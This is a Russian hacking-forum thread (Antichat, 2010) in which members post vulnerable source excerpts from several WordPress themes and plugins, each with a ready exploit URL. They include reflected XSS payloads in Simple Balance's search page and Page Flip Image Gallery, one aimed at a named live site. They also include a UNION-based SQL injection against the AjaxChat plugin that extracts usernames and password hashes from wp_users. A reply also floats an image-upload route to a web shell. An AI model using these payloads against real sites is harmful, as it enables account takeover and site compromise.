Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
06.06.2010, 21:49
|
|
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
Провел на форуме:
11581319
Репутация:
241
|
|
Wordpress 2.9.2 Passive XSS
Search.php
Сразу оговорюсь, данная уязвимость присутствует не во всех wp-темах.
Рассмотрим тему Simple Balance
search.php:
PHP код:
<?php include (TEMPLATEPATH . '/header.php'); ?>
<div id="page">
<?php
if (!isset($theme_options["layout_style"]) || $theme_options["layout_style"] == "scs") {
include (TEMPLATEPATH . '/lsidebar.php');
}
?>
<div id="content">
<?php include (TEMPLATEPATH . '/topads.php'); ?>
<h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>
<?php if (have_posts()) : ?>
<?php while (have_posts()) : the_post(); ?>
<div class="post">
<div class="postTitle"><h2><a href="<?php the_permalink() ?>" rel="bookmark" title="<?php the_title(); ?>"><?php the_title(); ?></a></h2></div>
<div class="postInfo">Опубликовано <?php the_time('d.m.Y'); ?> в рубрике <?php the_category(', ') ?> <?php edit_post_link('изменить', '(', ')'); ?></div>
<div class="postContent">
<?php the_excerpt(); ?>
</div>
<?php if(function_exists('the_tags')) { ?><div class="postExtras"><strong>Метки:</strong> <?php the_tags('', ', ', ''); ?></div><?php } ?>
<div class="postMeta">
<span class="postLink"><a href="<?php the_permalink() ?>" title="<?php the_title(); ?>">Читать пост</a></span>
<?php
$comNo = get_comment_type_count('comment'); // Checking if there are any actual comments (trackbacks and pingbacks excluded)
if ($comNo == 1 ) {
?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span>
<?php }
elseif ($comNo > 1) {
?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span>
<?php }
else {
?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Прокомментируете?', 'Прокомментируете?'); ?></span>
<?php } ?>
</div>
</div>
<?php endwhile; ?>
<div class="navigation">
<div class="left"><?php previous_posts_link('« В будущее') ?></div>
<div class="right"><?php next_posts_link('В прошлое »') ?></div>
</div>
<?php else: ?>
Ничего не найдено.<br />
Извините, по вашему запросу ничего не найдено. Возможно, вам стоит изменить параметры поиска?
<?php endif; ?>
</div>
<?php
if (isset($theme_options["layout_style"]) && $theme_options["layout_style"] == "css") {
include (TEMPLATEPATH . '/lsidebar.php');
}
?>
<?php include (TEMPLATEPATH . '/rsidebar.php'); ?>
</div>
<?php include (TEMPLATEPATH . '/footer.php'); ?>
нас интересует только:
PHP код:
<h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>
Как видим, скрипт выводит параметр $s, никак не фильтруя его.
Соответственно если передать скрипту js код в теге <script>, он выполнится.
Эксплуатация:[host]/[path]/?s=[xss]
Пример: http://seocekret.ru/?s=<script>alert()</script>
Последний раз редактировалось total90; 07.06.2010 в 19:40..
Причина: спасибо brain[pillow]
|
|
|
06.06.2010, 22:51
|
|
Новичок
Регистрация: 20.01.2010
Сообщений: 4
Провел на форуме:
19629
Репутация:
0
|
|
подскажите как узнать версию wordpress
|
|
|
|
06.06.2010, 22:55
|
|
Участник форума
Регистрация: 30.09.2009
Сообщений: 148
Провел на форуме:
11581319
Репутация:
241
|
|
Сообщение от karencho777
подскажите как узнать версию wordpress
В исходнике страницы.
<meta name="generator" content="WordPress x.x" />
|
|
|
|
07.06.2010, 00:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Page Flip Image Gallery cкачать
Version 0.5.10.8 Updated 2010-4-29 Downloads 459,700
Passive XSS
wp-content\plugins\page-flip-image-gallery\script.php
PHP код:
<?php
ob_start();
error_reporting(0);
if ($_GET['action'] == 'test')
{
echo "OK\n".$_GET['id'];
exit();
}
/*...*/
http://[host]/wp-content/plugins/page-flip-image-gallery/script.php?action=test&id=<script>alert(123)</script>
Последний раз редактировалось Strilo4ka; 07.06.2010 в 00:47..
|
|
|
|
07.06.2010, 00:48
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Сообщение от Strilo4ka
В файле upload.php можна походу грузить файл, но разширение должно быть как картинка, если веб-сервер обрабат. .php.jpg как php -> шелл
Что значит обрабатывает php.jpg как php?
Впервые такое слышу.
Он будет обрабатывать его как картинку, так что чтобы выполнить код скрипта придется искать, скажем, инклуд 
|
|
|
|
07.06.2010, 02:12
|
|
Участник форума
Регистрация: 07.11.2008
Сообщений: 124
Провел на форуме:
1483379
Репутация:
386
|
|
Сообщение от total90
В мозилле код не выполнится!
Эксплуатация:[host]/[path]/?s=[xss]
Пример: http://seocekret.ru/?s=<script>alert()</script>
Риальне пи3датая пассивка, только вот жаль такой же её пи3датый "обнаруженец" не знает, что для того чтобы в мозилле увидеть результат функции alert(), в неё нужно что-нибудь передать.
|
|
|
|
07.06.2010, 05:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
AjaxChat скачать
Last Updated: 2010-6-2
SQL inj
wp-content\plugins\ajaxchat\ajaxchat_ping.php
PHP код:
require_once('ajaxchat_config.php');
if(!session_id()) { session_start(); }
header("Pragma: no-cache");
header("Cache-Contro: no-cache");
$id=$_GET['lastid']?$_GET['lastid']:0;
function getrand($len) {
$str="";
$a=array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9');
for($i=0;$i<$len;$i++) {
$rand=rand(0,count($a)-1);
$str.=$a[$rand];
}
return $str;
}
global $current_user;
get_currentuserinfo();
$t=time();
$r=$wpdb->get_row("SELECT name,starttime FROM ".$wpdb->prefix."ajaxim_sess WHERE sessid='".session_id()."'");
if(!$r->name) {
$wpdb->query("INSERT INTO ".$wpdb->prefix."ajaxim_sess (name,lasttime,starttime,sessid) VALUES('Guest_".getrand(5)."',".$t.",".$t.",'".session_id()."')");
}
else {
$wpdb->query("UPDATE ".$wpdb->prefix."ajaxim_sess SET lasttime=".$t." WHERE sessid='".session_id()."'");
if($current_user->ID!='' && $r->name!=$current_user->display_name) {
$wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."ajaxim_sess SET name='%s' WHERE sessid='%s'",$current_user->display_name,session_id()));
}
}
$_SESSION['lastmsg']=$id;
$r2=$wpdb->query("SELECT name,time,msg,msgid FROM ".$wpdb->prefix."ajaxim_data WHERE time>".$r->starttime." AND msgid>".$id." ORDER BY time");
if($r2>0) {
$str="NEW:";
foreach($wpdb->last_result as $res) {
$str.="<div id='".$res->msgid."' name='".$res->msgid."'>(".date("g:ia",$res->time).") <".$res->name."> ".stripslashes($res->msg)."</div>";
}
print $str;
}
Exploit:
http://[host]/wp-content/plugins/ajaxchat/ajaxchat_ping.php?lastid=1+or+1=1+union+select+1,2 ,concat_ws(0x3a,user_login,user_pass),4+from+wp_us ers
Последний раз редактировалось Strilo4ka; 07.06.2010 в 05:03..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для brain[pillow]](/avatars/avatar67568.jpg?2190450){kind=avatar}
Похожие темы
Линейный вид
